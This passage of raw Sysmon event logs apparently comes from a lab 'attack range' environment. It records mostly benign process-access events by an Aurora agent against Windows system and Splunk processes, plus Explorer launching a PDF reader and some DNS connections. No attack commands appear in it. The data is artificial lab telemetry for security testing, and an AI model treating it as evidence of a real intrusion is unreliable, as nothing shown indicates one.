Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.250{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005288C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000039444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.694{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local49251- 354300x800000000000000039443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:38.694{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63759- 10341000x800000000000000015061Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.752{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015060Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.749{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015059Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.747{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015058Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.742{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015057Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.739{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015056Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015055Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.736{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015054Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.727{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015053Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.726{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015052Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.723{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015051Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.720{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015050Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.713{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015049Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.707{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015048Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.704{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015047Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.692{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015046Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.688{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015045Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.682{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015044Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.680{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015043Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.660{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015042Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.652{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015041Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.638{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015040Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.629{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015039Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.617{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015038Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.590{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015037Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.585{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015036Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.580{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015035Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.574{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015034Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.568{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015033Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:42.560{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015032Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 